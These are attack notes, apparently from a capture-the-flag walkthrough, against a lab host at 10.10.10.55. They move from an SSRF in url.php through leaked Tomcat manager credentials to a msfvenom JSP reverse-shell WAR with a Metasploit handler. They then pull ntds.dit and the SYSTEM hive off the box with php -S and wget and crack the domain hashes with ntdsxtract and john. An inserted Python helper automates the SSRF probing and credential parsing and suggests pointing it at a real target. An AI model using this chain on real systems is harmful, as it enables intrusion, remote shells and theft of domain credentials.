- Fair share of dirb: we find Tomcat 8.5.5 on port 8080
- and some weird browser on port 60000
- SSRF 10.10.10.55:60000
- https://www.acunetix.com/blog/articles/server-side-request-forgery-vulnerability/
- http://10.10.10.55:60000/url.php?path=http://10.10.10.55:60000/server-status/
- mod_status scoreboard columns: Srv PID Acc M CPU SS Req Conn Child Slot Client VHost Request (the VHost column leaks which internal host:port the server itself handles; 127.0.0.1:888 is the one we haven't seen yet)
- 0-1 - 0/0/7001 . 0.25 4725 0 0.0 0.00 2.36 127.0.0.1 127.0.0.1:888 OPTIONS * HTTP/1.0
- 1-1 22045 0/6616/7645 _ 1.87 238 2 0.0 2.32 2.70 10.10.15.32 127.0.0.1:60000 NULL
- 2-1 22046 0/6631/7252 _ 1.86 280 9 0.0 2.32 2.50 10.10.15.32 127.0.0.1:60000 NULL
- 3-1 - 0/0/6767 . 0.24 4729 0 0.0 0.00 2.25 127.0.0.1 127.0.0.1:888 OPTIONS * HTTP/1.0
- 4-1 - 0/0/7373 . 2.05 4728 0 0.0 0.00 2.88 127.0.0.1 127.0.0.1:888 OPTIONS * HTTP/1.0
- 5-1 - 0/0/7242 . 2.01 4724 0 0.0 0.00 2.62 127.0.0.1 127.0.0.1:888 OPTIONS * HTTP/1.0
- http://10.10.10.55:60000/url.php?path=127.0.0.1:888
- port 888 takes a ?doc= parameter; find ?doc=backup
- view-source:http://10.10.10.55:60000/url.php?path=127.0.0.1:888?doc=backup
- bingo
- <user username="admin" password="3@g01PdhB!" roles="manager,manager-gui,admin-gui,manager-script"/>
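Added example, not part of the original notes: a small Python helper that automates the three SSRF steps above (pull the leaked mod_status rows to find internal listeners, probe them through url.php, then parse the credentials out of the backed-up tomcat-users.xml). It assumes url.php takes a `path` query parameter and echoes the fetched body verbatim, returning an empty body for closed ports; that behaviour, the `FAKE_BACKEND` responses, the sample scoreboard rows and the sample tomcat-users.xml are all constructed for the example.

```python
import re
import urllib.error
import urllib.request
from urllib.parse import parse_qs, urlencode, urlparse
from xml.etree import ElementTree as ET

# Constructed sample of the mod_status scoreboard as leaked through the SSRF.
# Column order: Srv PID Acc M CPU SS Req Conn Child Slot Client VHost Request
SERVER_STATUS_ROWS = """\
0-1 - 0/0/7001 . 0.25 4725 0 0.0 0.00 2.36 127.0.0.1 127.0.0.1:888 OPTIONS * HTTP/1.0
1-1 22045 0/6616/7645 _ 1.87 238 2 0.0 2.32 2.70 10.10.15.32 127.0.0.1:60000 NULL
3-1 - 0/0/6767 . 0.24 4729 0 0.0 0.00 2.25 127.0.0.1 127.0.0.1:888 OPTIONS * HTTP/1.0
"""

# Constructed tomcat-users.xml in the layout Tomcat ships (note the default namespace).
TOMCAT_USERS = """<?xml version="1.0" encoding="UTF-8"?>
<tomcat-users xmlns="http://tomcat.apache.org/xml" version="1.0">
  <role rolename="manager-gui"/>
  <user username="tomcat" password="s3cret" roles="manager-gui"/>
  <user username="admin" password="3@g01PdhB!" roles="manager,manager-gui,admin-gui,manager-script"/>
</tomcat-users>
"""

VHOST_RE = re.compile(r"^[\w.\-]+:\d+$")


def internal_vhosts(status_text):
    """Collect the VHost column (host:port the server handled) from scoreboard rows."""
    found = set()
    for line in status_text.splitlines():
        cols = line.split()
        # Scoreboard rows start with a slot id like 0-1; the Request column may contain spaces,
        # but VHost is always the 12th token.
        if len(cols) >= 12 and re.match(r"^\d+-\d+$", cols[0]) and VHOST_RE.match(cols[11]):
            found.add(cols[11])
    return found


def ssrf_url(proxy, target):
    """Build the url.php request; encoding matters once the inner URL carries ?, & or #."""
    return proxy + "?" + urlencode({"path": target})


def http_fetch(url, timeout=5):
    """Real fetcher: body as text, empty string on any network/HTTP error."""
    try:
        with urllib.request.urlopen(url, timeout=timeout) as resp:
            return resp.read().decode(errors="replace")
    except (urllib.error.URLError, OSError):
        return ""


def probe_ports(proxy, fetch, host="127.0.0.1", ports=range(1, 65536)):
    """Ask the SSRF endpoint to hit host:port; a non-empty body is treated as 'open' (assumption)."""
    alive = {}
    for port in ports:
        body = fetch(ssrf_url(proxy, f"http://{host}:{port}/"))
        if body:
            alive[port] = body[:80]
    return alive


def tomcat_users(xml_text):
    """Return [(username, password, {roles})]; tolerates the xmlns Tomcat puts on the root."""
    users = []
    for el in ET.fromstring(xml_text).iter():
        if el.tag.rsplit("}", 1)[-1] == "user":
            roles = {r.strip() for r in el.get("roles", "").split(",") if r.strip()}
            users.append((el.get("username"), el.get("password"), roles))
    return users


def deployable_users(xml_text):
    """manager-script (text API) or manager-gui is what we need to push a WAR."""
    return [u for u, _, roles in tomcat_users(xml_text) if roles & {"manager-script", "manager-gui"}]


# Constructed stand-in for the internal service on port 888 so the flow runs offline.
FAKE_BACKEND = {
    "http://127.0.0.1:888/": "<html>doc viewer</html>",
    "http://127.0.0.1:888/?doc=backup": TOMCAT_USERS,
}


def fake_fetch(url):
    target = parse_qs(urlparse(url).query).get("path", [""])[0]
    return FAKE_BACKEND.get(target, "")


if __name__ == "__main__":
    proxy = "http://10.10.10.55:60000/url.php"
    print("internal listeners:", internal_vhosts(SERVER_STATUS_ROWS))
    print("open via SSRF:", probe_ports(proxy, fake_fetch, ports=[80, 888, 8080]))
    backup = fake_fetch(ssrf_url(proxy, "http://127.0.0.1:888/?doc=backup"))
    print("users who can deploy:", deployable_users(backup))
```

Swap `fake_fetch` for `http_fetch` against a real target; keep `probe_ports` to a short port list first, since every probe is a full round trip through the SSRF endpoint.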
- log into tomcat
- upload war reverse shell
- msfvenom -p java/jsp_shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f war > shell.war
- use exploit/multi/handler
- set PAYLOAD java/jsp_shell_reverse_tcp
- set LHOST <LHOST value>
- set LPORT <LPORT value>
- set ExitOnSession false
- exploit -j -z
- sessions -i 1
- python -c 'import pty;pty.spawn("/bin/bash");'
- find the ntds.dit
- on the box, serve the directory holding the dit and the SYSTEM hive: php -S 10.10.10.55:8888
- from the attacker: wget 10.10.10.55:8888/X.dit
- wget 10.10.10.55:8888/X.bin (the SYSTEM hive, needed for the boot key)
- NOT WORKING: https://didierstevens.files.wordpress.com/2016/07/20160710-211607.png
- https://implicitdeny.org/2016/05/cracking-domain-passwords-ntds-dit-metasploit-john/
- Get tools:
- git clone https://github.com/libyal/libesedb
- git clone https://github.com/csababarta/ntdsxtract
- build libesedb (run inside the cloned directory):
- sudo apt install autoconf automake autopoint libtool pkg-config
- ./synclibs.sh
- ./autogen.sh
- ./configure
- make
- sudo ldconfig
- esedbtools/esedbexport -m tables /root/20170721114636_default_192.168.110.133_psexec.ntdsgrab._333512.dit
- esedbexport 20171002
- Opening file.
- Exporting table 1 (MSysObjects) out of 12.
- Exporting table 2 (MSysObjectsShadow) out of 12.
- Exporting table 3 (MSysUnicodeFixupVer2) out of 12.
- Exporting table 4 (datatable) out of 12.
- Exporting table 5 (hiddentable) out of 12.
- Exporting table 6 (link_table) out of 12.
- Exporting table 7 (sdpropcounttable) out of 12.
- Exporting table 8 (sdproptable) out of 12.
- Exporting table 9 (sd_table) out of 12.
- Exporting table 10 (MSysDefrag2) out of 12.
- Exporting table 11 (quota_table) out of 12.
- Exporting table 12 (quota_rebuild_progress_table) out of 12.
- Export completed.
- python /root/ntdsxtract/dsusers.py datatable.3 link_table.5 extract/ --lmoutfile LM.out --ntoutfile NT.out --passwordhashes --pwdformat john --syshive system.bin
- john --rules=all --fork=2 extract/NT.out